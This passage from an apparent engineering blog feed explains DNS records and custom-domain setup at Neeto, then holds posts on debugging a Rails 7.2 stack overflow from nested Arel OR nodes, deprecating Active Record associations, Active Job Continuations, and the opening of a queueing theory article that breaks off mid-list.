So we will add these two DNS records.</p><p>For our marketing site, we will add an A record something like this (an A record rather than a CNAME, because the value is an IP address and the record sits on the root domain):</p><pre><code class="language-sh">spinjudo.com IN A 76.76.21.21</code></pre><p>And then for the blog, we will add a CNAME record something like this:</p><pre><code class="language-sh">blog   IN   CNAME   domains.wordpress.com.</code></pre><p>So now both <code>https://spinjudo.com</code> and <code>https://blog.spinjudo.com</code> are working.</p><p>But what about <code>https://www.spinjudo.com</code>?</p><p>Developers often forget that users can type <code>https://spinjudo.com</code> or they can also type <code>https://www.spinjudo.com</code>.</p><p>From time to time, you might have come across cases where a site works only with <code>www</code> or only without <code>www</code>. That's because the developers either took care of <code>www</code> and forgot to take care of the root domain, or they took care only of the root domain and not of <code>www</code>.</p><p>Technically, <code>www</code> is a subdomain, and it needs to be taken care of too. In this case, for <code>spinjudo.com</code> we need to add one more record for <code>www</code>, and that might look like this:</p><pre><code class="language-sh">www IN A 76.76.21.21</code></pre><h2>Rules regarding CNAME records</h2><p>The first rule is that CNAME records can <strong>only</strong> be added to subdomains. It means CNAMEs can't be added to root domains. That's the rule.</p><p>However, some DNS providers allow a technique to bypass this rule. 
They provide a different type of record, called an &quot;ANAME&quot; record, which allows CNAME-like behavior for root domains.</p><p>In general, we advise against using ANAME records.</p><p>The second rule is that if a subdomain has a CNAME record, then that subdomain can't have any more records.</p><h2>Why do we need to wait for some time after updating the domain</h2><p>If you change anything related to DNS, you are asked to wait 24 to 48 hours for the change to propagate. What does that mean?</p><p>If you type www.neeto.com into your browser, it uses its DNS cache. The browser might not even ask anyone what the IP address of www.neeto.com is. This is because maybe 20 seconds ago you visited www.neeto.com and now you refreshed the page.</p><p>If the browser really needs an updated DNS value, then the browser will send that request to your laptop. Your laptop has a DNS cache too. Your laptop might not ask anyone for the updated DNS value for a while.</p><p>Now, if the laptop needs to know the DNS value, then the laptop will ask the root servers for an answer.</p><p>There are only 13 root servers in the world. These root servers are named from &quot;A&quot; to &quot;M&quot;. However, just because there are 13 root servers, it doesn't mean that there are only 13 physical servers. Each of those 13 root servers is backed by lots of physical servers.</p><p>The complete list of physical servers can be found at https://root-servers.org.</p><p>Root servers do not know the answer to every question. However, they do know the address of the servers that can answer your questions. For example, if your TLD is <code>.com</code>, then the root server will send you to one server. If your TLD is <code>.net</code>, then you will be asked to go to a different machine. 
Similarly, there are servers to serve TLDs like <code>.co.uk</code>, <code>.in</code>, etc.</p><p><img src="/blog_images/2026/dns-basics-and-how-dns-works-in-neeto/domain-hierarchy.png" alt="Domain hierarchy"></p><p>Note that at each layer, there is some amount of DNS caching. To ensure that the updated value has propagated throughout the whole Internet, we need to give the old cached values some time to be removed.</p><p>The way these servers work also shows the decentralized nature of DNS. There is no single place where all the DNS values of the world are stored. DNS values are stored at different places, but there is a path to get to those values all the way from the root servers.</p><h2>neeto-custom-domains-frontend package</h2><p>Adding a custom domain can be intimidating. People are asked to change DNS records, which they might not have touched for years. A small misconfiguration has the potential to bring the whole website down. To ensure that the user experience of adding a &quot;custom domain&quot; is great, we at <a href="https://neeto.com">Neeto</a> decided to go the extra mile.</p><p>We bought one domain each at the following name registrars:</p><ul><li>Cloudflare</li><li>Namecheap</li><li>Hostinger</li><li>DigitalOcean</li><li>Wix</li><li>Porkbun</li><li>Squarespace</li><li>AWS Route 53</li><li>Network Solutions</li><li>GoDaddy</li><li>Strato</li><li>Microsoft 365</li></ul><p>We checked out how they ask their users to make DNS entries, and we captured the screenshots. 
Now, depending on what &quot;name server&quot; the user is dealing with, we display a help message and help screens customized for that user.</p><p>For example, if a user is using Cloudflare as their name server, then the help screen might look like this.</p><p><img src="/blog_images/2026/dns-basics-and-how-dns-works-in-neeto/custom-domain-neeto-help-for-cloudflare.png" alt="Adding custom domain for cloudflare"></p><p>Notice that the above image has a column called &quot;Proxy&quot;, which is Cloudflare-specific.</p><p>If the domain registrar is GoDaddy, then the help screen might look like this.</p><p><img src="/blog_images/2026/dns-basics-and-how-dns-works-in-neeto/dns-in-neeto-godaddy.png" alt="Adding custom domain for GoDaddy"></p><p>At <a href="https://neeto.com">Neeto</a> we build a number of products, and almost all the products need the &quot;custom domain&quot; feature. To share the code related to domain handling in a consistent manner, we have built a utility tool named <code>neeto-custom-domains-engine</code>.</p><p>When a user adds a domain to a Neeto product, this tool finds the name server of that domain. Then we check whether we have custom help screens and help instructions for that name server. If we don't, then we provide generic help instructions.</p><h2>Validating DNS records</h2><p>Now that the user has added the custom domain, Neeto needs to verify that those DNS records are indeed added.</p><p>If a user tries to add the domain <code>www.spinjudo.com</code>, then Neeto will ask the user to add the following CNAME for <code>www</code>.</p><table><thead><tr><th>Name</th><th>Value</th></tr></thead><tbody><tr><td>www</td><td>dns.neetodeployapp.com</td></tr></tbody></table><p>Now, let's assume that the user has added that record. We need to verify this record. 
Let's execute the following command from the terminal.</p><pre><code class="language-sh">nslookup -type=CNAME www.spinjudo.com</code></pre><p>We should see a response similar to this:</p><pre><code class="language-sh">Non-authoritative answer:
www.spinjudo.com    canonical name = dns.neetodeployapp.com.</code></pre><p>Here we can see that the DNS record has propagated properly for this domain, and it's resolving to the expected value. Now, let's see how this would look for a domain without the proper records added.</p><pre><code class="language-sh">nslookup -type=CNAME www.spinjudo2.com</code></pre><p>This is the response we will get for <code>spinjudo2</code>.</p><pre><code class="language-sh">Non-authoritative answer:
*** Can't find www.spinjudo2.com: No answer</code></pre><p>This could mean two things.</p><ol><li>The user has not added the records properly.</li><li>The records have been added, but they have not propagated yet. Sometimes it can take up to 48 hours for the added records to be seen.</li></ol><p>In this case, we saw an example of validating CNAME records. However, the same process is followed when validating A records or AAAA records.</p><h2>Traefik to route the custom domain</h2><p>Typically, one can deploy an application using services like Heroku, Render, or Railway, or directly on cloud services like EC2, GCP, Azure, etc. At Neeto, we decided to build NeetoDeploy. It's a service similar to Heroku for our internal use.</p><p>NeetoDeploy uses <a href="https://traefik.io/traefik">Traefik</a>, which is a leading modern open source reverse proxy. In simple terms, Traefik is a load balancer. All requests come to the load balancer, and then the requests are routed to the right place.</p><p>Earlier, we talked about setting up a custom domain. I have set up a custom domain for <code>https://calendar.spinjudo.com</code>. 
As part of setting up the custom domain, I added a CNAME pointing to <code>dns.neetodeployapp.com</code>.</p><p>After adding the CNAME, Neeto validated the record. Once Neeto determines that the user has correctly added the CNAME, Neeto adds these custom domains to Traefik. In reality, four records are added, as shown in the picture.</p><p><img src="/blog_images/2026/dns-basics-and-how-dns-works-in-neeto/spinjudo-traefik.png" alt="Adding domains to traefik"></p><p>In total, we see four records. The first two records are &quot;websecure&quot;. It means they have <code>https</code> turned on. The last two are just &quot;web&quot;. It means they support <code>http</code>.</p><p>Once a request for the domain <code>calendar.spinjudo.com</code> comes in, it is sent to NeetoDeploy's Traefik. Traefik maps <code>calendar.spinjudo.com</code> to an instance of the NeetoCal application, and the request is forwarded to that server.</p><p>Please note that Traefik doesn't fulfill the request. Traefik acts as a load balancer and sends the request to the right server.</p><p><img src="/blog_images/2026/dns-basics-and-how-dns-works-in-neeto/traefik-handling-requests.png" alt="Traefik handling requests"></p><h2>Finding the IP address</h2><p>When a user types https://calendar.spinjudo.com, the browser needs to know the IP address to hit. In other words, we ultimately need to know the A record.</p><p>We can use the tool <code>dig</code> to find the final A record value when a user visits https://calendar.spinjudo.com. First, let's see the tool in action.</p><pre><code class="language-sh">dig +noall +answer calendar.spinjudo.com A</code></pre><p>The response we get is the following:</p><pre><code class="language-sh">calendar.spinjudo.com. 60 IN CNAME dns.neetodeployapp.com.
dns.neetodeployapp.com. 60 IN CNAME a7b4fc193275e43ea9ba2b7753b080dc-6ad6aaca90bd0ea4.elb.us-east-1.amazonaws.com.
a7b4fc193275e43ea9ba2b7753b080dc-6ad6aaca90bd0ea4.elb.us-east-1.amazonaws.com. 
60 IN A 34.233.85.113</code></pre><p>The first line is a CNAME to <code>dns.neetodeployapp.com</code>.</p><p>The second line is a CNAME to an AWS Elastic Load Balancer.</p><p>The third line is an A record, which gives us the IP address of the machine.</p><p>In the above command, we used <code>+noall</code> and <code>+answer</code>. The <code>+noall</code> is really useful. It means &quot;just hide all the output&quot;. By default, <code>dig</code> spits out a lot of information. By using <code>+noall</code> we tell <code>dig</code> to go into quiet mode.</p><p>And then we tell <code>dig</code> to show data for the &quot;answer&quot; section by using <code>+answer</code>.</p><p>Similarly, using <code>dig +noall +authority</code> will show only the data for the &quot;authority&quot; section.</p><h2>Issuing SSL certificate</h2><p>We know that a user can visit http://spinjudo.com, or the user can also visit https://spinjudo.com. To serve HTTPS, we need SSL certificates.</p><p>We could ask the user to purchase an SSL certificate, configure it, and apply it, but that would be too cumbersome for our users.</p><p>To generate SSL certificates, we use <a href="https://letsencrypt.org/">Let's Encrypt</a>, which issues free, trusted SSL certificates.</p><p>Let's Encrypt issues SSL certificates using the Automatic Certificate Management Environment (ACME) protocol. This is a simple protocol by which the service can verify the ownership of the requested domain.</p><p>The process of validating the domain, issuing a certificate, and then renewing the certificate can be a bit daunting. To make life easier, there is <a href="https://certbot.eff.org/">certbot</a>. This tool makes it easier to get SSL certificates from Let's Encrypt.</p><p>It's worth noting that a certificate issued by Let's Encrypt is valid only for 3 months. 
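</p><p>As an illustration, requesting a certificate with certbot for our hypothetical domain might look like this (the exact plugin and flags depend on how the site is served; <code>--standalone</code> is just one option):</p><pre><code class="language-sh">sudo certbot certonly --standalone -d spinjudo.com -d www.spinjudo.com</code></pre><p>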
Before the certificate expires, we need to ask Let's Encrypt to issue a new certificate, and that certificate will be valid for another 90 days.</p><h2>NeetoCal using Cloudflare</h2><p><a href="https://neeto.com/cal">NeetoCal</a> and other Neeto products use Cloudflare as their name servers.</p><p>If we look at the NeetoCal DNS records, this is what we see.</p><p><img src="/blog_images/2026/dns-basics-and-how-dns-works-in-neeto/neetocal-dns-record.png" alt="NeetoCal DNS record"></p><p>The <code>*</code> in place of the name of the record is known as a wildcard character. This serves as a catch-all for any undefined subdomain, meaning all the subdomains that do not have an explicit DNS record associated with them will be matched by this record. As we can see in the picture above, the <code>*</code> value is proxied. What it means is that any attempt to connect to the NeetoCal IP address first hits the Cloudflare servers. Cloudflare runs a bunch of checks on the incoming request, and then passes that request to the intended IP address.</p><p>For example, if I'm getting a lot of spammy requests from Spain, then I can configure Cloudflare to block requests coming from Spain. Or I can rate-limit requests for the <code>/login</code> URL, and things like that.</p><p>If we do not use the proxy, then that means the user is directly connecting to the Neeto server and Cloudflare is not in the picture. In this case, if a <a href="https://www.cloudflare.com/en-gb/learning/ddos/what-is-a-ddos-attack/">DDoS</a> attack happens, then Cloudflare will not be able to protect us.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Debugging a Stack Overflow in Rails 7.2.1.1]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/debugging-stack-overflow-in-rails"/>
      <updated>2025-11-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/debugging-stack-overflow-in-rails</id>
<content type="html"><![CDATA[<p>A few weeks ago, after upgrading <a href="https://www.neeto.com/neetocal">NeetoCal</a> from Rails 7.1.5.2 to Rails 7.2.1.1, we started seeing mysterious crashes in production with the error message <code>SystemStackError: stack level too deep</code>.</p><h2>Identifying the problem</h2><p>The crash happened inside <code>Slots::SyncAllCalendarsService</code>, a service that syncs multiple calendars concurrently using the <code>Async</code> gem. What made it particularly puzzling was that switching from <code>Async::Barrier</code> to <code>Thread.new</code> made the error disappear. This led us down a rabbit hole thinking it was an Async-specific issue.</p><p>The stack trace pointed to a strange location:</p><pre><code>activerecord (7.2.1.1) lib/arel/visitors/to_sql.rb:898:in `each'
  from lib/arel/visitors/to_sql.rb:898:in `each_with_index'
  from lib/arel/visitors/to_sql.rb:898:in `inject_join'
  from lib/arel/visitors/to_sql.rb:627:in `visit_Arel_Nodes_Or'
  ... 1132 levels...</code></pre><p>Over a thousand levels deep into <code>visit_Arel_Nodes_Or</code>. That's unusual. Why would visiting OR nodes in a SQL query cause such deep recursion?</p><p>The stack trace mentioned <code>Slots::SyncAllCalendarsService</code>, but that service itself had nothing obviously wrong. It was just iterating through calendars and syncing them. We traced deeper into the code and found the actual culprit in Neeto's <code>Integrations::Icloud::SyncEventsService</code>:</p><pre><code class="language-ruby">def abandoned_events
  pairs = event_params.map { |e| [e[:url], e[:recurrence_id]] }

  @_abandoned_events = calendar.events
    .where(&quot;start_time BETWEEN ? AND ?&quot;, start_time, end_time)
    .where.not([:url, :recurrence_id] =&gt; pairs)
end</code></pre><p>This code finds &quot;abandoned&quot; events by excluding events that match specific URL and recurrence ID combinations. 
In production, <code>pairs</code> contained 233 entries. Nothing immediately suspicious, right?</p><p>To understand what was happening, we needed to see what Rails was actually doing with this query. The <code>where.not([:url, :recurrence_id] =&gt; pairs)</code> syntax is Rails' composite key feature. With 233 pairs, Rails generates SQL like this:</p><pre><code class="language-sql">WHERE NOT (
  (url = 'url1' AND recurrence_id = 'rec1') OR
  (url = 'url2' AND recurrence_id = 'rec2') OR
  (url = 'url3' AND recurrence_id = 'rec3') OR
  -- ... 230 more OR clauses
)</code></pre><p>233 OR clauses. That's a lot, but databases can handle it. The problem wasn't the SQL itself - it was how Rails built the internal representation of that query.</p><h2>Going into Rails Internals</h2><p>To really understand what changed, we used <code>bundle open activerecord</code> to look at the Rails source code. We compared the same code in Rails 7.1.5.2 and 7.2.1.1.</p><h3>What We Found in Rails 7.1.5.2</h3><p>In Rails 7.1.5.2, the code that visits OR nodes looked like this:</p><pre><code class="language-ruby">def visit_Arel_Nodes_Or(o, collector)
  stack = [o.right, o.left]

  while o = stack.pop
    if o.is_a?(Arel::Nodes::Or)
      stack.push o.right, o.left
    else
      visit o, collector
      collector &lt;&lt; &quot; OR &quot; unless stack.empty?
    end
  end

  collector
end</code></pre><p>This is an iterative approach using a manual stack. No matter how deeply nested the OR conditions are, this code only uses a single stack frame for the <code>visit_Arel_Nodes_Or</code> method. 
It's stack-safe.</p><h3>What Changed in Rails 7.2.1.1</h3><p>In Rails 7.2.1.1, the same method became much simpler:</p><pre><code class="language-ruby">def visit_Arel_Nodes_Or(o, collector)
  inject_join o.children, collector, &quot; OR &quot;
end</code></pre><p>Where <code>inject_join</code> does:</p><pre><code class="language-ruby">def inject_join(list, collector, join_str)
  list.each_with_index do |x, i|
    collector &lt;&lt; join_str unless i == 0
    collector = visit(x, collector)  # Recursive call
  end
  collector
end</code></pre><p>This is a recursive approach. If an OR node contains another OR node, it calls <code>visit</code>, which calls <code>visit_Arel_Nodes_Or</code>, which calls <code>inject_join</code> again. The recursion depth grows with the nesting depth of the OR tree.</p><h2>The Tree Structure Problem</h2><p>But why is the OR tree so deeply nested? We found the answer in Active Record's <code>PredicateBuilder#grouping_queries</code>:</p><pre><code class="language-ruby">def grouping_queries(queries)
  if queries.one?
    queries.first
  else
    queries.map! { |query| query.reduce(&amp;:and) }
    queries = queries.reduce { |result, query| Arel::Nodes::Or.new([result, query]) }
    Arel::Nodes::Grouping.new(queries)
  end
end</code></pre><p>That <code>reduce</code> call is the key. It builds a left-deep nested tree:</p><pre><code>Level 1:   Query1 OR Query2 = OR_Node_1
Level 2:   OR_Node_1 OR Query3 = OR_Node_2
Level 3:   OR_Node_2 OR Query4 = OR_Node_3
...
Level 232: OR_Node_231 OR Query233 = OR_Node_232</code></pre><p>With 233 pairs, this creates 232 levels of nesting. Each level adds approximately 5 stack frames when Rails traverses it recursively. 
That's 1,160 stack frames just for the query building.</p><h2>The Async Connection</h2><p>Why did <code>Thread.new</code> work but <code>Async::Barrier</code> didn't?</p><p>We wrote a test script to measure the actual stack depth limits in different contexts:</p><pre><code class="language-ruby">def test_recursion_depth(context_name)
  depth = 0
  recurse = lambda do |n|
    depth = n
    recurse.call(n + 1)
  end

  begin
    recurse.call(0)
  rescue SystemStackError
    return depth
  end
end

thread_depth = nil
Thread.new do
  thread_depth = test_recursion_depth(&quot;thread&quot;)
end.join
puts &quot;Thread recursion limit: ~#{thread_depth} calls&quot;

async_depth = nil
Async do
  async_depth = test_recursion_depth(&quot;async&quot;)
end
puts &quot;Async fiber recursion limit: ~#{async_depth} calls&quot;</code></pre><p>When we ran this, the results were revealing:</p><pre><code>Thread recursion limit:      ~11910 calls
Async fiber recursion limit: ~1482 calls</code></pre><p>Threads have roughly 8x more stack space than Async fibers. This is because threads use larger stacks (1MB-8MB), while fibers are designed to be lightweight with smaller stacks (512KB-1MB). This difference in stack allocation is why threads can handle deeper recursion before hitting the overflow limit.</p><p>With 233 pairs requiring ~1,160 stack frames, we were right at the edge of the Async fiber limit. But we were still well within the thread limit, which is why switching to <code>Thread.new</code> seemed to fix it.</p><p>When we tested with 500 pairs (which some of our larger calendars had), even <code>Thread.new</code> failed with a stack overflow. 
So it wasn't really a fix; it just pushed the problem further down the road.</p><h2>The GitHub Trail</h2><p>After we understood the problem, we searched the Rails repository and found the exact history:</p><ol><li><p><strong>April 4, 2024 - <a href="https://github.com/rails/rails/pull/51492">PR #51492</a></strong>: This PR changed OR nodes from <strong>binary</strong> to <strong>n-ary</strong> to handle multiple children in a single node.</p></li><li><p><strong>September 24, 2024 - <a href="https://github.com/rails/rails/issues/53031">Issue #53031</a></strong>: Someone reported the exact issue we were seeing. Queries with 800+ OR conditions that worked in Rails 7.1 now crashed in Rails 7.2.</p></li><li><p><strong>September 25, 2024 - <a href="https://github.com/rails/rails/pull/53032">PR #53032</a></strong>: <a href="https://github.com/fatkodima">fatkodima</a> fixed it with a one-line change in <code>PredicateBuilder#grouping_queries</code>:</p></li></ol><p><strong>Before:</strong></p><pre><code class="language-ruby">queries = queries.reduce { |result, query| Arel::Nodes::Or.new([result, query]) }</code></pre><p><strong>After:</strong></p><pre><code class="language-ruby">queries = Arel::Nodes::Or.new(queries)</code></pre><p>The difference is profound. The old code using <code>reduce</code> created a deeply nested structure like Russian nesting dolls:</p><pre><code>Or([Or([Or([Query1, Query2]), Query3]), Query4])  # 232 levels with 233 pairs</code></pre><p>The new code creates a flat structure:</p><pre><code>Or([Query1, Query2, Query3, Query4, ...Query233])  # Just 1 level</code></pre><p>With a flat structure, the recursive visitor only traverses one level instead of 232, eliminating the stack overflow. The fix is available in Rails 7.2.2+.</p><h2>Our Solution</h2><p>We're currently on Rails 7.2.1.1, and upgrading immediately would require extensive testing. 
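</p><p>To make the difference between the two tree shapes concrete, here is a small stand-in in plain Ruby. <code>Node</code> below is a hypothetical substitute for <code>Arel::Nodes::Or</code>, not the real class:</p><pre><code class="language-ruby"># Node is a hypothetical stand-in for Arel::Nodes::Or.
Node = Struct.new(:children)

# Tree depth: leaves (plain integers here) contribute 0.
def depth(node)
  return 0 unless node.is_a?(Node)
  1 + node.children.map { |child| depth(child) }.max
end

queries = (1..233).to_a

# Rails 7.2.0 - 7.2.1 style: reduce builds a left-deep binary tree.
nested = queries.reduce { |result, query| Node.new([result, query]) }

# Rails 7.2.2+ style: a single n-ary node holding all children.
flat = Node.new(queries)

puts depth(nested) # prints 232
puts depth(flat)   # prints 1</code></pre><p>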
So we implemented a workaround in our code:</p><pre><code class="language-ruby">def abandoned_events
  return @_abandoned_events if defined?(@_abandoned_events)

  pairs = event_params.map { |e| [e[:url], e[:recurrence_id]] }
  return if pairs.empty?

  events_in_time_range = calendar.events
    .where(&quot;start_time BETWEEN ? AND ?&quot;, start_time, end_time)

  # Get candidate events using simple IN clauses
  urls = pairs.map(&amp;:first).uniq
  recurrence_ids = pairs.map(&amp;:last).uniq

  candidate_events = events_in_time_range
    .where(url: urls)
    .where(recurrence_id: recurrence_ids)

  # Filter to exact pairs in memory
  pairs_set = pairs.to_set
  ids_to_exclude = candidate_events.select { |event|
    pairs_set.include?([event.url, event.recurrence_id])
  }.map(&amp;:id)

  @_abandoned_events = if ids_to_exclude.empty?
    events_in_time_range
  else
    events_in_time_range.where.not(id: ids_to_exclude)
  end
end</code></pre><p>This approach:</p><ul><li>Uses simple IN clauses instead of complex OR conditions</li><li>Filters the exact pairs in memory (fast with a Set)</li><li>Excludes by ID, which is a flat list</li><li>Never builds deeply nested Arel nodes</li></ul><p>The trade-off is that we run 2 queries instead of 1, but the queries are simpler and more efficient. 
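</p><p>The in-memory pair check at the heart of the workaround can be sketched in isolation. The data below is made up, and <code>Event</code> is a plain struct rather than an Active Record model; a Hash plays the role of the Set for constant-time membership checks:</p><pre><code class="language-ruby"># Pairs to exclude, as exact (url, recurrence_id) combinations.
pairs = [[:url1, :rec1], [:url2, :rec2]]
excluded = {}
pairs.each { |pair| excluded[pair] = true }

# Stand-ins for the candidate events returned by the two IN clauses.
# Event 2 matches the url of one pair and the recurrence_id of another,
# so the IN clauses alone would over-match it.
Event = Struct.new(:id, :url, :recurrence_id)
candidates = [
  Event.new(1, :url1, :rec1), # exact pair, excluded
  Event.new(2, :url1, :rec2), # cross match, kept
]

ids_to_exclude = candidates
  .select { |event| excluded.key?([event.url, event.recurrence_id]) }
  .map { |event| event.id }

puts ids_to_exclude.inspect # prints [1]</code></pre><p>Membership checks against the hash are constant time, so the filtering cost grows linearly with the number of candidates. 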
The in-memory filtering is negligible since the result set is already constrained by the time range.</p><h2>Measuring and Verifying</h2><p>To prove our hypothesis, we wrote verification scripts that patched Rails internals to measure what was actually happening.</p><h3>Counting Arel Visitor Calls</h3><p>We created a script that patched <code>visit_Arel_Nodes_Or</code> to count how many times it was called and how deep the recursion went:</p><pre><code class="language-ruby">module Arel
  module Visitors
    class ToSql
      alias_method :original_visit_Arel_Nodes_Or, :visit_Arel_Nodes_Or

      def visit_Arel_Nodes_Or(o, collector)
        @or_call_count ||= 0
        @or_call_count += 1
        @max_depth ||= 0
        @current_depth ||= 0
        @current_depth += 1
        @max_depth = [@max_depth, @current_depth].max

        result = original_visit_Arel_Nodes_Or(o, collector)

        @current_depth -= 1
        result
      end
    end
  end
end</code></pre><p>Results with 50 test pairs:</p><ul><li><strong>Rails 7.1.5.2</strong>: <code>visit_Arel_Nodes_Or</code> was called 1 time, and the max recursion depth was 0.</li><li><strong>Rails 7.2.1.1</strong>: <code>visit_Arel_Nodes_Or</code> was called 49 times, and the max recursion depth was 100.</li></ul><p>With 233 pairs in production:</p><ul><li><strong>Rails 7.1.5.2</strong>: Still called 1 time, depth 0 (iterative approach)</li><li><strong>Rails 7.2.1.1</strong>: Called 232 times, depth ~466 (exceeds Async fiber limit)</li></ul><h3>Testing the Actual Breaking Points</h3><p>We ran the problematic query with different pair counts to find exactly where it breaks:</p><pre><code class="language-ruby"># Test with Async
Async do
  pairs = calendar.events.limit(count).pluck(:url, :recurrence_id)
  calendar.events.where.not([:url, :recurrence_id] =&gt; pairs).count
end.wait

# Test with Thread
Thread.new do
  pairs = calendar.events.limit(count).pluck(:url, :recurrence_id)
  calendar.events.where.not([:url, :recurrence_id] =&gt; 
pairs).count
end.join</code></pre><p>Results:</p><ul><li><strong>Async Fiber</strong>: Breaks at approximately 233 pairs</li><li><strong>Thread.new</strong>: Breaks at approximately 500 pairs</li></ul><p>This confirmed that <code>Thread.new</code> wasn't a real solution - it just had more headroom before hitting the same problem.</p><p>For now, we're sticking with our workaround. It works reliably, performs well, and doesn't require upgrading Rails immediately. When we do upgrade to Rails 7.2.2+, we can revert to the original clean syntax, knowing that the Rails team has fixed the underlying issue.</p><p>If you're on Rails 7.2.0 through 7.2.1.x and use composite key queries with large datasets, watch out for this issue. The fix is in Rails 7.2.2+, or you can work around it like we did.</p><h2>References</h2><ul><li><a href="https://github.com/rails/rails/pull/51492">PR #51492 - Bug introduced</a></li><li><a href="https://github.com/rails/rails/issues/53031">Issue #53031 - Bug reported</a></li><li><a href="https://github.com/rails/rails/pull/53032">PR #53032 - Bug fixed</a></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Active Record adds support for deprecating associations]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/active-record-deprecated-associations"/>
      <updated>2025-07-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/active-record-deprecated-associations</id>
<content type="html"><![CDATA[<p>In Rails 8, we can now mark Active Record associations as deprecated. This makes it easy to phase out old associations from our codebase while still keeping them around until their usages are safely removed. Whenever a deprecated association is used, whether by calling the association, executing a query that references it, or triggering a side effect like <code>:dependent</code> or <code>:touch</code>, Rails will alert us according to our chosen reporting mode.</p><h3>Marking an association as deprecated</h3><p>Simply pass the <code>deprecated: true</code> option when declaring an association.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord
  has_many :meetings, deprecated: true
end</code></pre><p>Now, every time the <code>meetings</code> association is invoked, we'll get a deprecation warning in our logs.</p><pre><code class="language-bash">&gt; user.meetings
The association User#meetings is deprecated, the method meetings was invoked ((calendar):4:in '&lt;main&gt;')

&gt; User.includes(:meetings).where(id: 1)
The association User#meetings is deprecated, referenced in query to preload records ()

&gt; User.joins(:meetings).where(id: 1)
The association User#meetings is deprecated, referenced in query to join its table ()</code></pre><h3>Working with different association types</h3><p>We can deprecate any association type.</p><pre><code class="language-ruby">class Order &lt; ApplicationRecord
  # has_many
  has_many :line_items, deprecated: true

  # belongs_to
  belongs_to :customer, deprecated: true

  # has_one
  has_one :profile, deprecated: true

  # has_many through
  has_many :archived_comments, through: :comments, deprecated: true
end</code></pre><h3>Reporting modes and backtrace support</h3><p>This feature supports three deprecation modes:</p><ul><li><code>:warn</code> (default): Logs a warning to the Active Record logger.</li><li><code>:raise</code>: Raises an exception when the deprecated association is used.</li><li><code>:notify</code>: Emits an 
Active Support notification event with the key <code>deprecated_association.active_record</code>. This can be used to send notifications to external services like Honeybadger. We can check the details about its payload <a href="https://edgeguides.rubyonrails.org/active_support_instrumentation.html#deprecated-association-active-record">here</a>.</li></ul><p>Backtraces are disabled by default. If <code>:backtrace</code> is true, <code>:warn</code> mode will include a clean backtrace in the message, and <code>:notify</code> mode will have a <code>backtrace</code> key in the payload. Exceptions raised via <code>:raise</code> mode will always have a clean stack trace.</p><p>We can change the global default mode in an initializer.</p><pre><code class="language-ruby"># config/initializers/deprecated_associations.rb
ActiveRecord.deprecated_associations_options = {
  mode: :warn,      # :warn | :raise | :notify
  backtrace: true   # whether to include a cleaned backtrace
}</code></pre><p>It can also be set at an environment level.</p><pre><code class="language-ruby"># config/environments/development.rb
Rails.application.configure do
  config.active_record.deprecated_associations_options = { mode: :raise, backtrace: true }
end

# config/environments/production.rb
Rails.application.configure do
  config.active_record.deprecated_associations_options = { mode: :warn, backtrace: true }
end</code></pre><h3>Why deprecate rather than remove?</h3><p>In large applications, it's often hard to guarantee complete test coverage. 
Some association usages may only surface in production.</p><p>Deprecating an association first lets us:</p><ul><li>Identify every code path (tests, console, background jobs) that relies on it.</li><li>Gradually refactor those references before removal.</li><li>Ensure confidence that deleting the association won't break anything unexpectedly.</li></ul><p>This new feature in Rails provides a clean and intuitive way to phase out our associations with deprecation warnings, making it easier to maintain and refactor large codebases.</p><p><em>This feature <a href="https://github.com/rails/rails/pull/55285">was merged</a> recently, and will be released in the next Rails minor/patch version.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Active Job Continuations]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/active-jobs-continuations"/>
      <updated>2025-06-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/active-jobs-continuations</id>
      <content type="html"><![CDATA[<p>Active Job Continuations was recently merged into Rails. We recommend that you go through the description in the <a href="https://github.com/rails/rails/issues/55127">pull request</a> since it is so well written.</p><p>If you prefer watching a video to learn about Active Job Continuations, then we made a video for you.</p><iframe width="560" height="315" src="https://www.youtube.com/embed/r4uuQh1Zog0" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe><p>In short, this feature allows you to configure your jobs in such a manner that a job can be interrupted, and the next time it starts, it resumes from a particular point so that the work done so far is not totally wasted.</p><p>This work is highly inspired by Shopify's <a href="https://github.com/Shopify/job-iteration">job-iteration</a> gem.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding Queueing Theory]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-queueing-theory"/>
      <updated>2025-06-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-queueing-theory</id>
      <content type="html"><![CDATA[<p><em>This is Part 6 of our blog series on <a href="/blog/scaling-rails-series">scaling Rails applications</a>.</em></p><hr><h2>Queueing Systems</h2><p>In web applications, not every task needs to be processed immediately. When you upload a large video file, send a bulk email campaign, or generate a complex report, these time-consuming operations are often handled in the background. This is where queueing systems like <a href="https://sidekiq.org/">Sidekiq</a> or <a href="https://github.com/rails/solid_queue">Solid Queue</a> come into play.</p><p>Queueing theory helps us understand how these systems behave under different conditions - from quiet periods to peak load times.</p><p>Let's understand the fundamentals of queueing theory.</p><h2>Basic Terminology in Queueing Theory</h2><ol><li><p><strong>Unit of Work</strong>: This is the individual item needing service - a job.</p></li><li><p><strong>Server</strong>: This is one &quot;unit of parallel processing capacity.&quot; In queueing theory, this doesn't necessarily mean a physical server. It refers to the ability to process one unit of work at a time. For JRuby or TruffleRuby, each thread can be considered a separate &quot;server&quot; since they can execute in parallel. For CRuby/MRI, because of the GVL, the concept of a &quot;server&quot; is different. We'll discuss it later.</p></li><li><p><strong>Queue Discipline</strong>: This is the rule determining which unit of work is selected next from the queue. For Sidekiq and Solid Queue, it is FCFS (First Come, First Served). If there are multiple queues, which job is selected depends on the priority of the queue.</p></li><li><p><strong>Service Time</strong>: The actual time it takes to process a unit of work (how long a job takes to execute).</p></li><li><p><strong>Latency/Wait Time</strong>: How long jobs spend waiting in the queue before being processed.</p></li><li><p><strong>Total Time</strong>: The sum of service time and wait time. 
